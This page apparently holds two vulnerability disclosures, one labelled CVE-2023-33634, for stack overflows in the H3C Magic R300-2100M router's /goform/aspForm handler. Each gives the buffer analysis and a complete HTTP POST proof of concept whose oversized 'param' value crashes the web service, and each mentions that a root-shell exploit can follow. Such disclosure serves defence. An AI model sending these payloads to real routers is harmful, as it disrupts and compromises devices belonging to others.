\# H3C Magic R300-2100M was discovered stack overflow via the EdittriggerList interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the EdittriggerList interface at /goform/aspForm. ## Vulnerability Details In function EdittriggerList(sub\_4619F4),the size of local variable v6 is noly 20 bytes long.Parameters in the EdittriggerList interface use the getElement function to split strings(Var). !\[\](https://i.imgur.com/wy2w9tz.png) !\[\](https://i.imgur.com/RNUHEA8.png) The maximum size in the getElement function is limited to 64. The size of the original array has been completely exceeded, resulting in a buffer overflow vulnerability. !\[\](https://i.imgur.com/9e8xgUd.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://i.imgur.com/aF82MZe.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 2034 CMD=EdittriggerList&param=;;;;;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://i.imgur.com/oOVNgxA.png) And you can write your own exp to get the root shell.

CVE-2023-33634: H3C Magic R300-2100M was discovered stack overflow via the EdittriggerList interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm. ## Vulnerability Details !\[\](https://hackmd.io/\_uploads/SJacutyr3.png) In the SetAPWifiorLedInfoById function, local variable v12 is 64 bytes long. !\[\](https://hackmd.io/\_uploads/rJSsOFkrn.png) V8 can be controlled by attacker, entered as parameter 'param'. In line 23, v8 is formatted into v12 by function sscanf as long as the size of the data we enter until ';'. So when the size of the data we enter before ';' is larger than 36 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://hackmd.io/\_uploads/rJekFFJH3.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 607 CMD=SetAPWifiorLedInfoById&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://hackmd.io/\_uploads/S1yZtY1Sn.png) And you can write your own exp to get the root shell.

Tag

#windows